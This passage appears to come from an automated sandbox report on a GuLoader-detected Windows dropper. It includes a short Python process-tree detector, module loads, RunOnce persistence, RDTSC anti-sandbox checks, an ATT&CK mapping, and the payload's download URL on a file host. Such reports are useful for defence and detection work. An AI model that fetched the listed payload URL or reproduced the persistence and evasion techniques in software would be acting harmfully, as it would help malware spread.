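    for parent, kids in build_tree(evts).items():
        print(parent, "->", kids)
    for kind, image in find_findings(evts):
        print(f"[{kind}] {image}")
```

On the rows above this yields two self_spawn findings (one per executable), one runs_from_temp and one unknown_parent, both on Dropworm.exe; the self-spawn of the dropped file is the same injection pattern as the submitted sample's, which is consistent with the shared code address seen in the "Code function" rows.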
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: iconcodecservice.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: iconcodecservice.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: riched20.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: usp10.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: msls31.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile written: C:\Users\user\kompatible\Sofacyklernes\disapproving.iniJump to behavior
            Source: 2Jq4fZJIJ8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match | File source: 00000000.00000002.1528537573.0000000006497000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2049759112.0000000006017000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1527552230.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2047681752.0000000000595000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1527552230.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2047681752.0000000000538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 2Jq4fZJIJ8.exe PID: 7492, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Dropworm.exe PID: 804, type: MEMORYSTR
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_10002D20 push eax; ret (0_2_10002D4E)

            Persistence and Installation Behavior

            Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system providers 2) Suspicious email domain 'Rdjet116.Ko' appears non-standard and likely fraudulent 3) Organization 'Waterloos' is not a known legitimate company 4) Large time gap between compilation date (2016) and certificate creation (2024) suggests possible certificate manipulation 5) The OU field 'Methodistic Mtaalighed' contains unusual/nonsensical terms 6) While US location is used, the combination of other suspicious elements suggests location spoofing 7) Certificate signature is explicitly marked as invalid by the system 8) The email format 'Rumored@' is highly unusual for a legitimate business certificate
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | File created: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | File created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Tapestrying (reported 4 times)
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Process information set: NOOPENFILEERRORBOX (reported 9 times)
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Process information set: NOOPENFILEERRORBOX (reported 9 times)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | API/Special instruction interceptor: Address: 68928D4
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | API/Special instruction interceptor: Address: 26528D4
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | API/Special instruction interceptor: Address: 64128D4
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | API/Special instruction interceptor: Address: 26528D4
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | RDTSC instruction interceptor: First address: 6846AAD second address: 6846AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A2874B231h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | RDTSC instruction interceptor: First address: 2606AAD second address: 2606AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A28C3C7A1h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | RDTSC instruction interceptor: First address: 63C6AAD second address: 63C6AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A2874B231h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | RDTSC instruction interceptor: First address: 2606AAD second address: 2606AAD instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F5A28C3C7A1h 0x00000006 cmp dl, FFFFFFE3h 0x00000009 inc ebp 0x0000000a cmp edx, 4AB459DCh 0x00000010 inc ebx 0x00000011 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dll
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe, TID: 2876 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe, TID: 7908 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00405FFD FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00402688 FindFirstFileA
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_00405FFD FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_00402688 FindFirstFileA
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 8_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_00405FFD FindFirstFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Code function: 9_2_00402688 FindFirstFileA
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWHtA
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWE
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | API call chain: ExitProcess graph end node (graph_0-4791)
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | API call chain: ExitProcess graph end node (graph_0-4788)
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | API call chain: ExitProcess graph end node (graph_9-3692)
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | API call chain: ExitProcess graph end node (graph_9-3696)
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Process created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Process created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exe | Code function: 0_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            ATT&CK matrix, listed per tactic (the number in parentheses is the count the report shows next to a matched technique; techniques without a number had no match):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: Query Registry (1); Security Software Discovery (31); Virtualization/Sandbox Evasion (1); File and Directory Discovery (3); System Information Discovery (24); Wi-Fi Discovery; Remote System Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

            Source | Detection | Scanner | Label
            2Jq4fZJIJ8.exe | 65% | Virustotal
            2Jq4fZJIJ8.exe | 53% | ReversingLabs | Win32.Trojan.GuLoader
            2Jq4fZJIJ8.exe | 100% | Avira | HEUR/AGEN.1361137
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | 100% | Avira | HEUR/AGEN.1361137
            C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe | 53% | ReversingLabs | Win32.Trojan.GuLoader
            C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll | 0% | ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsmE7DA.tmp\System.dll | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            http://ocsp.starfieldtechZ | 0% | Avira URL Cloud | safe
            http://crl.starfi | 0% | Avira URL Cloud | safe
            https://www.opendrive.com | 0% | Avira URL Cloud | safe
            http://ocsp.starz | 0% | Avira URL Cloud | safe
            http://crl.starfieldte | 0% | Avira URL Cloud | safe
            http://crl.starfieldtex | 0% | Avira URL Cloud | safe
            http://ocsp.star | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            od.lk | 38.108.185.115 | true | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin | false | | high
            https://od.lk/f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File+is+inaccessible+due+to+account+suspension. | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://web.opendrive.com/api/branding.json?user_id=2104337 | 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binm | Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://certs.starfieldtech.com/repository/0 | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | false | | high
